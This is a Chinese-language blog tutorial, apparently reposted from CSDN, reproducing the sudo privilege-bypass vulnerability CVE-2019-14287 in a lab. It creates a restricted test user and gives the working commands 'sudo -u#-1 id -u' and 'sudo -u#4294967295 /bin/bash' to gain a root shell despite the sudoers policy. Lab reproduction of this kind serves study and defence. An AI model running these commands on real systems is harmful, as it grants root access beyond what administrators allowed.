四、Linux sudo root 权限绕过漏洞(CVE-2019-14287)

本文阅读 3 分钟
首页 代码,C/C#/C++ 正文

一、漏洞分析:

1.该漏洞于2019年10月14日,被Sudo官方发布

2.该漏洞的用处:使受限制的sudo权限用户,可不受限制运行root命令

二、漏洞复现:

1.漏洞的环境:

2.漏洞的环境复现: ①输入以下命令,查看当前sudo 的版本; 进入root用户:sudo su 查看当前sudo的版本:sudo -V img //如上图所示,版本为1.8.16,可以进行漏洞复现

②建立一个用户ming; 输入以下命令创建用户ming: useradd ming 为用户ming设置密码123456: passwd ming (输入两次123456,即可设置成功) img ③给用户ming赋予他执行sudo的权限 第一步:首先要查看一下/etc/sudoers的权限: ll /etc/sudoers img //如上图所示:所属者root,权限只有可读,没有可写,为了修改该文件,赋予权限喽

第二步:输入以下命令,赋予权限:chmod u+w /etc/sudoers img //如上图所示,已经修改完成,现在root用户具有可写权限

第三步:修改/etc/sudoers文件,给用户ming赋予sudo权限 编辑该文件:vi /etc/sudoers img 给ming用户赋予sudo权限: ming ALL=(ALL:ALL) ALL 给ming用户设置安全策略:比如以下命令,我们期望用户ming 可以以管理员权限执行/usr/bin、/bin下的所有命令,但是不能修改其他用户密码以及kill其他用户进程,可以配置如下: ming ALL=/usr/bin/, !/usr/bin/passwd, /bin/, !/bin/kill // 之后的漏洞利用,可以获得root权限,从而略过该安全策略。 img ming ALL=这里加上 !/usr/bin/su, !/bin/su 为了禁止用户ming,直接切换到root

④切换用户到ming; 输入命令: su - ming img 注意:在修改/etc/sudoers完成后,输入以下命令,取出可写权限:chmod u-w /etc/sudoers ⑤验证该ming用户的权限: img 3.开始提权 ①输入以下命令: 回显0:sudo -u#-1 id -u 回显0:sudo -u#4294967295 id -u 输入命令提权:sudo -u#4294967295 /bin/bash img //如图所示,提权成功!!!!!!

我们之前,做了安全策略,对于ming用户不可以修改其它用户密码; 那么我们现在提权为root,那么就可以修改密码了。 img

三、总结:

1.背景:有sudo权限用户,但是被安全策略所限制,不能su切换到root,也不能改别人的密码,不能杀死进程等等… 2.提权:sudo的版本低于1.8.28 时候,我们直接提权为root

地低成海!!!
                                                                                                    2019-10-15---405
本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/102578341
-- 展开阅读全文 --
KillDefender 的 Beacon 对象文件 PoC 实现
« 上一篇 02-09
Web安全—逻辑越权漏洞(BAC)
下一篇 » 03-13

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复